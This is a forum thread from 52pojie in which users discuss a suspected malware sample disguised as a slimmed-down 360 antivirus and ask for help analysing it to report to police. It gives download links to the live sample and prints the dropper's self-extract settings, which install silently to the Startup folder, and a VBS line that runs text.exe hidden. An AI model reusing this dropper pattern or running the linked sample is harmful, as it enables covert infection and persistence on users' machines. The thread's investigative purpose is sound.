Hackblack 发表于 2019-7-5 14:58

一个CSDN中发现的病毒,有木有大神破一下(没有壳)

病毒地址:https://blog.csdn.net/qq_36916968/article/details/82259641
病毒样本:
- 1. 原地址:https://swssoftwareshare.gitee.io/sre/dist.exe
- 2. 防删备份:http://t.cn/AiOZQFOJ

CSDN博客里说这个是“绿色版360”,我看下只有2MB,精简得太离谱了。用WInRAR打开发现里面有一个dist.exe,还有一段自解压脚本


Path=%programdata%\Microsoft\Windows\Start Menu\Programs\Startup
SavePath
Setup=dist.exe
Silent=1
Overwrite=1


dist.exe又是一个自解压程序。自解压脚本如下


Path=C:\temp
SavePath
Setup=run.vbs
Silent=1
Overwrite=1

run.vbs内容如下


   Set ws = CreateObject("Wscript.Shell")
   ws.run "cmd /c text.exe",vbhide

那么这个text.exe就是病毒本体了。球、求大神破下,看看能不能搞到什么有用的信息交给公安。

TNT-P2P 发表于 2019-7-5 17:06

不太清楚我看不简单

小猫猫 发表于 2019-7-5 17:59

作者地址:
https://gitee.com/swssoftwareshare
https://github.com/swsyxgs

Hackblack 发表于 2019-7-6 08:58

已经举报警察叔叔
页: [1]
查看完整版本: 一个CSDN中发现的病毒,有木有大神破一下(没有壳)


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn